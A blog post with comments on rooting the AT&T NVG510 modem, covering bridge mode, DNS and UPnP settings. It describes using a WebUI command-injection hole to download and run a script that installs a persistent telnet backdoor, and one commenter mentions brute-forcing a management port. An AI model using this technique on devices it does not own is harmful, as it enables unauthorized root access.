Rooting The NVG510 from the WebUI

One-click Android Application

The fix to common problems with the NVG510 and NVG589 is now available as a push-button $3 Android app called NVG510 Fixer. You can see more information at this blog post. If you don't think it's worth it though (or want to do crazy technical things), just stick with the free instructions on this page.

 

 

Updated for new firmware! :)

This guide has been tested to work with the following hardware and firmware:

  • NVG510 9.0.6h2d30
  • NVG510 9.0.6h2d21
  • NVG510 9.0.6h048
  • NVG589 (unknown)

It's very possible that other Netopia OS based modems are affected as well. There is a Netopia modem used in Switzerland that probably can be rooted with this.

How to root the modem

Warning

WARNING: This is information on how to root your modem. Rooting is to take full control, like rooting your Android phone. It can possibly brick your modem if not used responsibly. USE AT YOUR OWN RISK

Enabling a telnet backdoor and reaching root shell

  1. View the modem's update page, which should be at http://192.168.1.254/cgi-bin/update.ha
  2. Login if you haven't already.
  3. Now you'll want to view the HTML source of the page.
  4. Search for the term "nonce" in the HTML source. You should see something like this:

    <input type="hidden" name="nonce" value="815a0aaa0000176012db85d7d7cac9b31e749a44b6551d02">

  5. Hang on to that piece of text and now load my control2 page.

  6. Take the "value" of the nonce and put it into the text field labeled nonce on the page. 815a0aaa0000176012db85d7d7cac9b31e749a44b6551d02 would be what you put into it for this example.
  7. Load the page up and push Save.
  8. At this point, you might see different things, depending on your browser. You might get a message that the page couldn't be displayed, or you might see some text. If you see the text, make sure that it says "backdoor telnet enabled" or some such. You might also just see the normal Web Update interface with an "invalid firmware image" message. This is nothing to worry about either.
  9. Now, you will need to reboot your modem. You can do this by going to http://192.168.1.254/cgi-bin/restarting.ha
  10. Now you should be able to login to the modem with telnet on port 28. The username is admin and the password is your modem's "access code" that should be written on it.
  11. Finally, you should see the shell.

To clarify, your telnet session should look like this:

[earlz@EarlzZeta ~]$ telnet 192.168.1.254 28
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.

login: admin
Password:

Terminal shell v1.0
Copyright (C) 2011 Motorola, Inc.  All rights reserved.
Motorola Netopia Model NVG510 Wireless-N ADSL AnnexA Ethernet Switch
Running Netopia SOC OS version 9.0.6 (build h2d30)
ADSL capable
(admin completed login: Admin account with read/write access.)

NOS/XXX> 

From here, you can do a few different things. This shell is called nsh. If you want to get to a root shell, just type !. At that point, you can do exit to get back to nsh. Also, if you prefer the shell described in the FCC manual (and used by AT&T techs), you can type cshell after getting to the root shell.

How does it work?

I've found a vulnerability in the WebUI of the NVG510 (and other modems) that allows me to execute any command as root. You can utilize this by sending it a specially crafted HTTP request.

So, I use this to download the shell script at http://earlz.net/static/backdoor.nvg510.sh and execute it on the modem. The shell script installs a new service into inetd so that it starts a telnet shell, and I configure it using pfs to be persistent. Otherwise, it would go away after rebooting.

Uninstalling the backdoor

The backdoor installed should be fairly safe, being password protected, but if you're especially worried, then it can easily be uninstalled. Just telnet into the modem, get to the root shell by using !, and then type:

pfs -r /var/etc/inetd.d/telnet28

Note! This backdoor will not be uninstalled with a factory reset or firmware update! Once you've installed it, it's there until you uninstall it! Again, there should be no risk in leaving it there; it will not be internet accessible. But it's easy to uninstall as well.

Solving common problems

To confirm you're at nsh, you should see a prompt like this:

Axis/1234565678> 

The nsh Console

This console is fairly simple and easy to use, and breaks out everything that you can configure on the modem. But, it is not the console described in the FCC manual.

This is the help text for the console, to help you understand:

Axis/124578433> help
help [command]                 : Get help.
history                        : Show command history.
get OBJ.ITEM                   : Get the value of OBJ.ITEM (ITEM is a
                                 parameter or status). ### Hint: run 'info
                                 OBJ.params' or 'info OBJ.status' to get a
                                 list of the OBJ's parameters and status.
set OBJ.ITEM VALUE             : Set the value of OBJ.ITEM to VALUE.
info INFO [ARGS ...]           : Get the INFO information (expert mode).
new OBJ [NAME]                 : Create an object with an (optional) name
                                 (requires an 'apply')
del OBJ                        : Delete an object (requires an 'apply')
aget OBJ.ITEM ATTR             : Get the OBJ.ITEM's ATTR attribute.
aset OBJ.ITEM ATTR VALUE       : Set the OBJ.ITEM's ATTR attribute to VALUE.
name OBJ [NAME]                : Get or set the OBJ's "name" (specify a new
                                 name to set it).
names [OBJ]                    : Recursively show all object names.
validate [OBJ]                 : Validate OBJ, or the entire database if no
                                 OBJ specified.
apply                          : Apply changes to the database (changes are
                                 NOT saved).
revert                         : Revert the database by discarding your
                                 changes.
save                           : Save the database (rewrites config.xml).
defaults                       : Reset the system back to the factory
                                 defaults (deletes config.xml).
dump [OBJ [LEVELS]]            : Dumps the OBJ's parameters, or the entire
                                 database. Use the optional LEVELS parameter
                                 to limit the depth of the database tree.
sdump [OBJ [LEVELS]]           : Dumps the OBJ's status, or the entire
                                 database.
tdump [TEMPLATE [LEVELS]]      : Dumps the template, or the entire SDB schema.
dirty [OBJ]                    : Displays which parameters are dirty.
run CMD [ARGS ...]             : Run the SDB's CMD command (expert mode
                                 only!).
event EVT [ARGS ...]           : Send the EVT (event number) to the SDB
                                 (expert mode only!).
console [on | off]             : Direct all log messages to this console.
                                 Without arguments, toggles on and off.
log [OPTIONS]                  : View log messages. See "log help" for more
                                 information.
voiplog [OPTIONS]              : View log messages. See "log help" for more
                                 information.
mfg [OPTIONS]                  : Set or view MFG parameters. See "mfg help"
                                 for more information.
mirror [PORT CAPTURE-PORT] | "off" : Mirror Ethernet traffic on PORT so that it
                                 may seen on CAPTURE-PORT. Specify "off" to
                                 turn mirroring off.
resetstats [OBJ] ["all"]       : Reset any statistics the object may have.
                                 The optional "all" argument will recursively
                                 reset all children's stats as well. If only
                                 "all" is given (OBJ is omitted), this will
                                 reset all statistics starting at the root
                                 node.
metadata OBJ.PARAM             : Returns metadata information about a given
                                 parameter.
fwinstall URL | "last"         : Install a firmware image. Use "last" to
                                 reuse the last URL.
crashdump ["erase"]            : Shows the most recent crash dump contents.
                                 The optional "erase" will erase both current
                                 and last saved crash dump contents.
reboot [N] | ["cancel"]        : Reboot the router in N seconds (default is
                                 2). "cancel" argument can be issued to
                                 cancel a previous reboot command.
source FILE                    : Read and process commands from FILE.
. FILE                         : An alias for 'source'.
exit                           : Exit from this shell.
quit                           : An alias for 'exit'.
magic                          : Enter magic mode.
crash                          : Read and Write the Memory mapped registers

Seems simple enough then doesn't it?

Example Configuration

So, let's say you want to enable SSH. The relevant configuration option for this is mgmt.shell.ssh-port. So, to set this, we type this in:

set mgmt.shell.ssh-port 22

This will set the SSH port to 22, rather than disabled. And then, if you're done configuring, you can save and apply the changes by typing these commands in:

validate
apply
save

You don't necessarily have to run validate, but I assume it's safer to use it. I believe that this is what happens:

  1. validate will validate the changes to make sure that no data was input in a way that wouldn't make sense (like if nameserver was set to 921.123.45.673)
  2. apply will actually cause the modem to notice the changes and begin executing using those changes you've made
  3. save will cause the changes you made to persist after reboot. I assume it saves it to flash with this command.

That's really about all there is to know. Configuration is super simple.

Configuration

As you can tell from the dump log, there are a ton of configuration options. Here I'll give you a hint to the more useful ones, as well as some configuration stuff to be aware of.

DNS problem fix

This is provided for historical reasons, but it's WRONG. This will not fix the DNS problems or let you point it at a different DNS server. I don't know why it doesn't work, but I've received multiple reports that it doesn't. Your best bet in this case is to use the true bridge mode and get your own router.

ip.dns.domain-name             = att.net
ip.dns.primary-address         = 99.99.99.53
ip.dns.secondary-address       = 99.99.99.153
ip.dns.proxy-enable            = on
ip.dns.override-allowed        = off

You should be able to change these to something more appropriate. override-allowed should be turned on (otherwise I believe they will be reset by DHCP over the DSL link).

Enabling Telnet and/or SSH

mgmt.shell.ssh-port            = 0
mgmt.shell.telnet-port         = 0

These you should change to what port you want it to run on. Note though that I've yet to figure out the username and password used for SSH. I've searched through both the dump and through the GPL source code and can't find any hints really.

So, to enable these you can just do something like

set mgmt.shell.ssh-port 22
set mgmt.shell.telnet-port 23
validate
apply
save

If you want to enable remote access to telnet and/or ssh (I highly recommend not opening up telnet to the world) you can modify these values to something appropriate:

mgmt.remoteaccess[3].protocol  = telnet
mgmt.remoteaccess[3].port      = 0    XX change this to 23
mgmt.remoteaccess[3].idle-timeout = 5
mgmt.remoteaccess[3].total-timeout = 20
mgmt.remoteaccess[3].max-clients = 4
mgmt.remoteaccess[4].protocol  = ssh
mgmt.remoteaccess[4].port      = 0     XX change this to 22
mgmt.remoteaccess[4].idle-timeout = 5
mgmt.remoteaccess[4].total-timeout = 20
mgmt.remoteaccess[4].max-clients = 4

Enabling UPnP

I haven't confirmed this, but I believe UPnP can be enabled by changing this to on:

mgmt.upnp.enable               = off
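
An added example, not part of the original guide: a small Python audit of saved nsh `dump` output that flags the management-exposure settings covered above (the telnet/SSH shell ports, the mgmt.remoteaccess entries and UPnP). It assumes, as the defaults shown above suggest, that a port of 0 means disabled; the function names, severity labels and sample values are made up for this example.

```python
import re
from collections import defaultdict

# Constructed sample in the `key = value` layout of the nsh dump excerpts on
# this page. The values are invented for the example, not taken from a modem.
SAMPLE_DUMP = """\
Axis/1234565678> dump mgmt
mgmt.shell.ssh-port            = 22
mgmt.shell.telnet-port         = 23
mgmt.remoteaccess[3].protocol  = telnet
mgmt.remoteaccess[3].port      = 23
mgmt.remoteaccess[3].idle-timeout = 5
mgmt.remoteaccess[4].protocol  = ssh
mgmt.remoteaccess[4].port      = 0
mgmt.upnp.enable               = off
"""

LINE_RE = re.compile(r"^\s*([A-Za-z0-9_.\[\]-]+)\s*=\s*(.*?)\s*$")
REMOTE_RE = re.compile(r"^mgmt\.remoteaccess\[(\d+)\]\.(protocol|port)$")
SEVERITY_ORDER = {"high": 0, "medium": 1, "info": 2}


def parse_dump(text):
    """Return {key: value} for each `key = value` line; prompts and blanks are skipped."""
    settings = {}
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if match:
            settings[match.group(1)] = match.group(2)
    return settings


def port_of(value):
    """First token of a dump value as a port number; 0 (assumed: disabled) otherwise."""
    tokens = value.split()
    return int(tokens[0]) if tokens and tokens[0].isdigit() else 0


def audit(settings):
    """Return (severity, key, message) findings, highest severity first."""
    findings = []

    port = port_of(settings.get("mgmt.shell.telnet-port", "0"))
    if port:
        findings.append(("medium", "mgmt.shell.telnet-port",
                         f"telnet shell on port {port}: the access code crosses the LAN in cleartext"))
    port = port_of(settings.get("mgmt.shell.ssh-port", "0"))
    if port:
        findings.append(("info", "mgmt.shell.ssh-port", f"SSH shell enabled on port {port}"))

    # Group the indexed mgmt.remoteaccess[N] entries so protocol and port are read together.
    remote = defaultdict(dict)
    for key, value in settings.items():
        match = REMOTE_RE.match(key)
        if match:
            remote[int(match.group(1))][match.group(2)] = value
    for index in sorted(remote):
        port = port_of(remote[index].get("port", "0"))
        if not port:
            continue
        protocol = remote[index].get("protocol", "unknown")
        severity = "high" if protocol == "telnet" else "medium"
        findings.append((severity, f"mgmt.remoteaccess[{index}].port",
                         f"remote {protocol} management enabled on port {port}"))

    if settings.get("mgmt.upnp.enable", "off").lower() == "on":
        findings.append(("medium", "mgmt.upnp.enable",
                         "UPnP on: LAN hosts can request inbound port mappings"))

    return sorted(findings, key=lambda finding: SEVERITY_ORDER[finding[0]])


if __name__ == "__main__":
    for severity, key, message in audit(parse_dump(SAMPLE_DUMP)):
        print(f"[{severity:6}] {key}: {message}")
```

Paste the output of `dump mgmt` from your own modem in place of the sample to see which of these settings are currently active.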

Disable "Potential Connection Issue" warnings

mgmt.lan-redirect.enable       = on

Change it to off. lan-redirect is what causes that extremely annoying redirecting to happen when the connection is lost or "has possible problems". When you send a request to the nameserver, instead of sending back no route, a timeout, or the actual name server's response, the modem makes every domain forward to 192.168.1.254, so that you then load an HTML page that causes a redirect (but isn't set to do-not-cache) to /cgi-bin/home.ha. So basically, you click do not show, yet the page continues to try to redirect due to modern web browser caching and the lack of a no-cache directive on the redirect page.

Disabling the DHCP server

conn[1].dhcps-enable           = on

Note that you'll have to configure a static IP to the modem to access it after this. I don't see much of a point in disabling it completely.

True Bridge Mode

A very often wanted feature of the NVG510 is for it to just get out of your way and let your (hopefully more sane) router deal with all the firewall and NAT business. After quite a bit of experimenting and starting over with default and a bit of an accident, I believe I've figured it out.

Some of the values in the NVG510's configuration "database" appear to be magical, and lots of assumptions have to be made without real technical documentation. So, let's look at the link object that appears to be linked to WAN and LAN connections in an assumed manner.

Here is what was in my modem's dump about links. Yours should look similar:

link[1].type                   = ethernet
link[1].igmp-snooping          = off
link[1].mtu-override           = 0
link[1].port-vlan.ports        = lan-1 lan-2 lan-3 lan-4 ssid-1 ssid-2 ssid-3 ssid-4
link[1].port-vlan.priority     = 0
link[2].type                   = ethernet
link[2].mtu-override           = 0
link[2].supplicant.type        = eap-tls
link[2].supplicant.qos-marker  = AF1
link[2].supplicant.priority    = 0
link[2].port-vlan.ports        = vc-1
link[2].port-vlan.priority     = 0
link[2].tagged-vlan[1].ports   = ptm
link[2].tagged-vlan[1].vid     = 0
link[2].tagged-vlan[1].priority = 0

ptm is the PPP connection. So we basically want the PPP connection to be routed straight to an ethernet port so our router can handle it. So here is what I did:

set link[1].port-vlan.ports "lan-2 lan-3 lan-4"
set link[2].port-vlan.ports lan-1

The first command sets the LAN link so that only LAN ports 2-4 are used. The next command sets the link for the WAN side. Previously, the port was vc-1. I assume vc-1 is hardwired to magically go to the LAN somehow. Anyway, replacing vc-1 with lan-1 basically makes the equivalent of a PPP bridge.

On the router side, all you have to do is use that port and the modem will do all of the PPP authentication, and I assume MRU shifting to 1500. All your modem will get is a raw stream from AT&T's servers. So if you send it a DHCP client request, you'll get a response straight from AT&T's servers.

This is the only configuration required as well. This will short through all of the modem's crappy configuration and directly forward it to the first ethernet port (the one closest to the barrel jack power adapter).

And if for some odd reason you need to access the actual modem (such as for reconfiguration), just plug your network cable into another port. The built-in DHCP server runs just as before, except it will never be connected to the internet.

Note: I've had reports that this doesn't completely work when your account is provisioned with multiple static IP addresses. If you have problems and are willing to lend me some time to test things with you, email me at earlz -AT- earlz dot net

Possible Problem: If your modem seems to "hang" when doing apply with the bridge mode configuration and you can't use the save command, then that means you tried to do it from port-1. Change which port on the NVG510 your computer is plugged into (or use Wifi if you're extra brave).

Other Dangerous Things

From this bootloader, you can change a lot of things AT&T probably would frown upon. Basically, you can make it look like another modem. I'm not for sure about this though and will have to test it and research it more. I don't recommend changing anything in the mfg section. If you do one of these kind of hacks, be prepared for AT&T to notice and ban you from U-Verse, your modem to become bricked, or for your dog to randomly die. Don't go too far into the dangerous looking unknown.

Conclusion

The NVG510 is really a decent modem, but has been kiddie-proofed so hard that it hurts. I hope this guide helps you take full control of your modem. Also, I don't recommend trying to evade your U-Verse account's capabilities. I imagine AT&T won't care much if they catch you modifying your modem... they will care if you modified it to reach 16Mbit speeds when you only have a 3Mbit account though, and I'm sure they keep tabs on it. Don't be stupid.

Same goes for trying to boost wifi power or use channels not specified for use in your country. The FCC is real! (btw, don't tell them about my FM transmitter project ;) )

Configuration Template

You can dump this for yourself, but to see what Motorola's "template" is for its configuration options you can check out this pastebin. If you don't know what options a configuration object supports, this is a good bit to look at. Though a few things in the template don't exist in my NVG510 at least and will cause crashes if objects are created. (cifs will not work for me)

Older Versions

This is a new hack that should work on old firmware. However, if you're interested in the old hack (that only works on old firmware), you can see the wayback machine for a historical copy.

Posted: 6/7/2012 12:26:03 AM

Comments

Anonymous
I'm glad you are digging into this modem and found this! I'd looked through the config stuff but missed the redirect disable option.

From the contents of /www/residential, it looks like either the software was designed for of devices, or this device is capable of supporting USB devices and DLNA.

I added info to wikidevi about grabbing data from the device, such as /www/*.
6/8/2012 3:19:12 PM
Earlz
Hey, sorry about the bad formatting of your comment. I guess that's a comment bug I missed in testing.

Anyway, I saw residential, but tried and it didn't like it much. It broke out quite a few more options, but is still missing some basics like DNS nameserver changing.

Also, thanks for updating that wiki. I wasn't for sure if this information really belonged there or not.
I did not even think of using that method to get files off of the modem! I instead opted to use the tftp client on the modem. 

Hopefully we can get more people taking control of this modem and posting their own tricks. 
One of the odd things I thought about it was that it supports having 4 different wireless networks.

Also, I believe the modem has USB support on the processor, but not all of the support hardware for it, as I don't see any pinout for it.  
6/9/2012 6:21:06 AM
Anonymous
I wanted to say Thank You for studying this device and sharing your findings.

Because of you I was able to disable that god awful redirect page.  It's a shame AT&T has this modem so jacked up and worse they don't seem to care.

Anyway,  Thanks again.
7/5/2012 3:16:43 AM
Earlz
@Anonymous Well, that stupid redirect page bugged me non-stop. It'd appear out of the blue sometimes without even a power failure. One time it did it, kicked me off XBox Live for no reason and I decided the fight was on. I have 2 modems anyway, might as well open one up. So, I opened it, got to the serial port.. and eventually ended up looking at the source code for the Web Interface and found a vulnerability. I had quite a few friends that had the same modem and same problems, so I documented it hoping to help everyone with this crappy modem. AT&T doesn't seem likely to ever patch their horrible firmware and don't care at all about how poorly it's designed.. Hopefully this trend continues because this exploit would be really easy to patch, and I believe it's the only one that exists 
7/5/2012 7:12:54 AM
Anonymous
How can I get the router to stop overriding my changes to the dns server?
Tired of having to go in again and again to change my nameserver back to google/opendns
I already tried the ip.dns.override-allowed option and that didn't stop it.
7/10/2012 8:54:03 PM
Earlz
@Anonymous. About the DNS problems. I know about this, but I don't see any easy solutions so far. 
7/11/2012 7:00:37 AM
Newbie
I followed the foregoing instructions and was able to get to the root via "magic" then "!".  I can both Telnet & SSH into the root.  I'm totally new to Linux and have been researching UNIX/Linux commands on Google.  However, I can not seem to figure out how to edit /etc/dnsmasq.conf or /var/etc/dnsmasq.conf.  Under either directory, whenever I enter vi /etc/dnsmasq.conf or vi /var/etc/dnsmasq.conf both Telnet & SSH return "/bin/sh: vi: not found".

I've also tried the commands edit; ed; ex w/the same results, e.g. "/bin/sh: ex: not found".

Any ideas on what I'm missing or doing wrong?
10/7/2012 2:44:16 PM
Earlz
@Newbie Hi! The included unix utilities for the NVG510 are a bit.. sparse. I believe the only way to edit files on the device is to use `cat` and output redirection. However, if you value your sanity, you won't do that :P

What I did to edit files is setup a TFTP server on my network and then use the included TFTP client on the modem to upload and download files. This is probably the easiest option. I've gotten a tip from elsewhere about some people compiling a less-restricted Busybox for the modem and then uploading it via TFTP. 
10/7/2012 5:41:49 PM
Anonymous
Thanks for this great help! I changed the dns servers but they are randomly being changed back. I assume is because I have dynamic IP or any time router is rebooted. I tried "override", but didn't work. I also set "dns proxy-enable" to off. But when I did this, I could no longer use the internet. Any help on how to get NVG510 to "hold" on to the DNS servers I input for good without changing back to att? Can I change DNS from DHCP?
11/18/2012 9:26:55 AM
Earlz
@Anonymous I don't know. There have been numerous reports from others about this problem but no one has seemed to find a solution yet. I don't use this modem anymore (switched to Cable), so I don't update any of this anymore. If anyone can figure it out though, I'll definitely publish a link to it. 
11/18/2012 8:35:26 PM
geeknik
I have static IPs, will putting them into 'bridge' mode cause any problems here?
12/14/2012 12:40:40 AM
Anonymous
Protip from someone who's dealt with similar bullshit from a Verizon-provided router: the DNS configuration and other settings may be being remotely enforced by a backdoor web configuration interface, or possibly just the remote management interface over the DSL line. In the Verizon configuration, the reason for opening a backdoor to router management was, as far as I could tell, for Verizon support requests from people who don't know what a router is and because certain services required opening ports to communicate with some of the cable TV services behind the coax part of the network, and they wanted to force auto configuration (look up MoCA if you're interested). Of course it's a gaping security hole (I could access it from anywhere on the Internet).
Point is, if you're lucky and it turns out DNS enforcement cannot be done over the DSL management interface, you may be able to stop the DNS behavior by disabling that remote management feature / port in the firmware (or adding firewall rules to prevent it f
12/14/2012 1:58:19 AM
Earlz
@Geeknik you shouldn't have any problems. You'll just have to make sure that your router properly handles the static IPs. You may have to manually set the IP(s) of your router in order to get it to work. I'm not for sure if AT&T directly passes down a static IP from their DHCP servers

@Anonymous I don't believe it's DNS enforcement. There is a management port open on the modem(to the public), but I can't get at the password. Tried brute forcing it, but didn't get anywhere. Also, by doing the true-bridge mode, this management port gets closed. With true bridge mode the modem literally does not think it's even connected to the internet. I don't believe updates or anything will be received in bridge mode. 
12/14/2012 3:28:45 AM
MG
Hi, I really liked your articles even if I don't own that kind of router. I've always wondered, how did you manage to get to the exploit? My guess is that you opened the source of a web page that allows you to edit some useless setting, via the standard UI or by downloading the page using the serial port stuff, then see how the post was made and then replicate the request mechanism with a different option name (like "mgmt.shell.telnet-port") and different value.
Am I correct? Am I missing something?
Thanks, and great job anyway.
12/14/2012 9:07:14 AM
Earlz
@MG that's exactly what I did. This particular exploit could've been found though without having the source code to the web application, but without access to the `nsh` shell and list of template configuration options, I wouldn't have been able to know what to change the form value to in order to enable telnet. 
12/14/2012 3:17:11 PM
Occam
Will this work with the 3800HGV-B?
12/16/2012 9:19:27 PM
Earlz
@Occam, highly doubtful. If I ever get U-Verse again, I can try my best to root it though. (Moved to Ohio and they told me I can't use the two NVG510 modems I already have of course. ugh, but apparently the modem up here is the 3800HGV) 

However, I've heard that the 3800HGV modem is much more sane than the NVG510, including being able to collect interesting things like precise line statistics and charts. 
12/17/2012 8:07:39 AM
Anonymous
Can confirm that the uPnP option does indeed enable uPnP.
12/18/2012 3:32:06 PM
Earlz
@Anonymous it does enable UPnP at least partially. The only thing I use UPnP for is so multiple XBoxs can have an open NAT type and this did the trick with 2 Xboxs... however, I set this up for one of my friends who has anywhere from 3-6 setup at a time and only 1 ended up with an open NAT type. Not sure if that's a limitation of xbox live, only having a single IP, or if this modem doesn't have a good UPnP implementation
12/18/2012 5:30:27 PM
Technobabe
Wow, Earlz, this is awesome! So nice to be able to CONTROL this bloody thing! I am having a strange problem with the NVG510, and I was wondering if you can point me in a useful direction to fix it. I have an NVG510 with a 3-bit subnet and a Linux server with an Intel eepro100 network card wired into the NVG510. When I fire up the NVG510 and plug nothing into it, the ping responses are at about 50ms. As soon as I plug my Linux server into it, the ping response time bounces all over the place - anywhere from 50ms to 600ms, although mostly in the 150-200ms range! The SMARMY AT&T tech told me that I have a "network configuration issue" and AT&T doesn't work on that. So, I went thru EVERY networking setting on both the server and the NVG510 at least 3 times, and I can see nothing that would cause this. Any ideas? Since I had AT&T replace the NVG510 and got the 50%+ packet failure down to consistently under 5%, the throughput is good, but why not get every bit of speed I can get? Thanks for any insight you can provid
12/18/2012 7:58:05 PM
Earlz
@Technobabe: I have no idea. First off, I'd make sure that it's really the NVG510. Plug a different computer to it and see if you have the same problem. If so, then see if wireless has the same latency issue. Beyond that, as a last resort you might want to try my true bridge mode to use your own router. This gets the NVG510 completely out of the way and lets your router do what it was made for.. routing. 
12/18/2012 9:23:01 PM
Anonymous
Regarding the modem in Ohio:

I am in Columbus and just recently (this month, December) started using Uverse, and they sent an NVG510.  So apparently it's more complicated than just statewide Ohio=3800HGV.

Anyway, I don't know how this can even be legal, the pure shittiness of the NVG510.  Isn't this why we have consumer regulatory agencies and stuff?  Hey, I have an idea how to make lots of money, I'll offer people high-speed internet with a one-year contract, but instead of actually providing them internet or anything like that I'll just send them a brick and tell them it's a modem!
12/26/2012 6:28:14 PM
Earlz
@Anonymous: It is indeed more complicated than just statewide. Apparently the NVG510 is used where there is U-Verse internet and phone, but not TV. (and using VDSL, not fiber to the home/node)

Also, you should watch out for patents with that technique. I think AT&T thought of it first! 
12/27/2012 3:28:06 PM
Anonymous
Is there anyway I can change my ip address with the root access? 
12/30/2012 12:31:09 AM
Earlz
@Anonymous: I assume you mean your public IP address. And probably not. If AT&T is even mildly competent, their servers won't allow this. However, changing manufacturer tied values and such may induce something like this. I'll warn you that this is one of those things AT&T will notice though and that probably voids your service agreement
12/30/2012 6:46:18 AM
Anonymous
@Earlz 
Well, let's say I buy another nvg510 and register it with my service will that change my public ip address given that the mac address is different?
12/30/2012 10:08:49 AM
Anonymous
Do I have to do a reset on NVG510 before turning it to True Bridge Mode? Currently, I am using IP-Passthrough Mode.
1/3/2013 10:41:35 PM
Tony
Can't seem to follow the true bridge guide. Modem locks up after doing "apply" after entering the two set commands.
1/6/2013 12:32:37 AM
Earlz
@Tony hmm that's odd. Have you tried doing a factory reset and then following the bridge mode instructions? 
1/6/2013 5:17:24 AM
Anonymous
I tried your instructions for the bridge mode and while it works, for some reason, the Broadband Status page of the NVG510 still showed the device as getting a valid public IP address and from the shell I could actually ping out to the public internet.
1/11/2013 8:50:09 AM
AnonymousW
Earl,

Thank you soooo much. I could not get my Slingbox with the NVG510 until I read your article and enabled UPnP. Now it works great.
1/19/2013 1:20:54 AM
Pepper
Thanks for doing this. I think just putting the thing in bridge mode is going to solve my issues. I am now able, from the outside world, to pull up a web page hosted on my test machine behind the nvg510, just got to figure out why rdp and ping are not working yet.
1/30/2013 8:23:23 AM
Toao
Thought I should note, that for those having trouble with bridge mode after hitting apply, make sure you are configuring the modem via port 2,3,4 and NOT doing it on port 1, as when you hit apply port 1 will drop the telnet connection and begin the bridge to ATT. YOU MUST do the configuration while on lan port 2,3, or 4 so that you can SAVE or your configuration will NOT be persistent (it will reset every time the router turns off and you will lose bridge mode). I did this bridge mode last night and when I rebooted my Cisco router I lost all configuration and my router was DHCP'd a private net IP instead of the precious REAL internet IP I had earned.... lol
1/31/2013 6:17:16 PM
Earlz
@Toao, very good point! I hadn't thought about that. I'll add a note to the article
2/1/2013 2:47:31 AM
Sean
Once the TrueBridgeMode has been enabled, what connection type would then be chosen in my Asus router? PPPoE or normal DHCP?
2/8/2013 11:30:10 PM
Earlz
@Sean normal DHCP. It's definitely NOT PPPoE. If you need a username and password for it, you chose the wrong one. 
2/9/2013 3:06:25 AM
Anonymous
When I press "Save" on the complete_control page, I get redirected to my router configuration page, but it says:

"Address must not be on network (10.x.x.x)"

=/
2/16/2013 2:27:37 AM
Earlz
@Anonymous oooohhh... That sounds scary :( I have no way of verifying, but it sounds like the remote vulnerability might not exist in your firmware version (i.e., it was patched). Email me at earlz @ this domain name (earlz.net) and I'll try to work out what's happening.
2/16/2013 3:53:24 AM
Brother
My brother figured out the DNS changes.  He changed the proxy setting to "Off", Then he set an IP for the primary and Secondary setting, then applied, saved, then rebooted.  And it worked. The override was already set to "On". "iponfig /all" now show Open DNS name servers.
2/17/2013 3:25:50 AM
Brother
"ipconfig /all" now shows Open DNS name servers.
2/17/2013 3:28:12 AM
The Brother
To add to the previous Brother post.  Go to http://www.opendns.com/support/article/64 to test the settings and the tests were all successful.
I believe the DNS proxy setting (ip.dns.proxy-enable = on is the default) allows the device, i.e., router, to allow name requests to be forwarded to the ATT name servers. Turning that off and setting open DNS servers allows the hosts on the network to receive those IP addresses via DHCP.  We'll see what happens after a couple days to see if the settings hold.
Note:  The ip.dns override-allowed setting was 'ON' as the default.  I did not change that. In the article above it shows it as off.  Not sure why but, it works for me with it ON.

Didn't know it could be easy... when you know a few secrets. Saved me running out and getting another router!

A BIG thanks to EARLZ for pointing us all in the right direction.  Would never have done it without your help.
2/17/2013 4:03:08 AM
The Brother
Update.  Device was turned off overnight and the DNS settings reverted to the factory at&t dns setting.
Anyone know how to make it permanent?  Re-entered using the configure command in normal shell and it seemed
to behave the same.  The settings would stay there during a reboot, but if it was turned off, the settings would
go back to 0.0.0.0 for primary and secondary
2/17/2013 11:03:57 PM
Earlz
As I noted at the beginning of the article, this is an open problem. It would appear that AT&T has hardcoded the DNS settings to be permanently non-configurable. I've heard of some hack with changing the DNS server's configuration file, but I don't imagine this being easy
2/18/2013 4:37:35 AM
Anonymous
This doesn't seem to work for me, but I also have my NVG510 assigned as 192.168.0.1 - is that messing up the control page?
2/20/2013 5:34:14 AM
Earlz
@Anonymous did your modem come shipped that way? Like if you do a factory reset does it reset it to 192.168.1.254?
2/20/2013 10:12:51 PM
Dngrsone
If I put my NVG510 into true bridge mode (to use with a Smoothwall Express firewall), would I be able to use the NVG510's wifi from behind the firewall (like, route the Protected LAN into lan2)? 
2/21/2013 2:31:57 AM
Anonymous
No, it didn't come set that way, I assume it would revert back to 192.168.1.254.  I changed it because that's how my previous network was setup when I switched ISPs, and it made it easier to change over.  I could change it back to the default if that's necessary, but then I will have to change the config of the router that sits behind it.  I'll do that if I have to, just checking to see if that is the issue before making the changes.
2/21/2013 4:04:35 AM
Earlz
@dngrsone In theory it could work, but I haven't been successful in getting it to. Once you put it in bridge mode, the wireless is basically useless. However, you could MAYBE disable the DHCP server and then have a setup like `modem bridged-out -> router in -> router out -> modem non-bridged port` and I THINK that would work. No guarantees though. Worst case is it'll reset everything to defaults when it crashes
2/21/2013 6:43:09 AM
Dngrsone
Hahaha... optimistic pessimism.  I love it.

Whelp, if I try, I will report back, either way it goes.  Be a shame to waste a decent wifi if it doesn't work out that way.

@Anonymous-- I have mine set to a different IP, and the hack doesn't work for me.  I think the page Earlz set up assumes the default IP when it sends the command to the modem.  You might try resetting the modem to default settings and then hit it with the hack.  
2/22/2013 12:14:04 AM
Anonymous
Yep, that did it.  Actually I just changed the IP of the modem (and the DHCP IPs), and the IP on my inside router.  Rooted the modem, changed the IPs back, and all is well.  Thanks much.
2/22/2013 3:21:21 AM
Tim S
HUGE thanks to Earlz for his hack and to Brother for the DNS-specific fix. I've had the DNS failure to resolve issue for over a year and it drove me bananas daily. I read the instructions and I was able to change the primary and secondary DNS of the NVG510 modem. I don't know if the settings will stick after a reboot or power cycle, but I do that maybe once every 3 months so it's no big deal. Anyway here's the exact command line syntax for other newbies like me:

login: admin
password: <number on your modem>
magic
!
nsh
You will need to login once more at the NSH prompt

Axis ############>
set ip.dns.proxy-enable off
set ip.dns.override-allowed on
set ip.dns.primary-address 208.67.222.220
set ip.dns.secondary-address 208.67.220.222
validate
apply
save

Open up a CMD prompt in Windows and type in "ipconfig /all"
You should now see that the primary and secondary DNS numbers have been changed to the OpenDNS servers.
Thanks again. You guys rock. I can't wait to try some of the other more obs
2/25/2013 7:22:26 AM
dick
Of interest to you, Earlz?
We are pleased to announce the Open Source redistribution for the NVG510 DSL CPE gateway product.
http://sourceforge.net/motorola-home/nvg510/news/2012/01/nvg510-open-source-redistribution/
http://sourceforge.net/projects/nvg510.motorola-home/files/README-NVG510.txt/download
http://sourceforge.net/projects/nvg510.motorola-home/files/
http://sourceforge.net/motorola-home/wiki/Projects/
3/1/2013 10:25:05 PM
dick
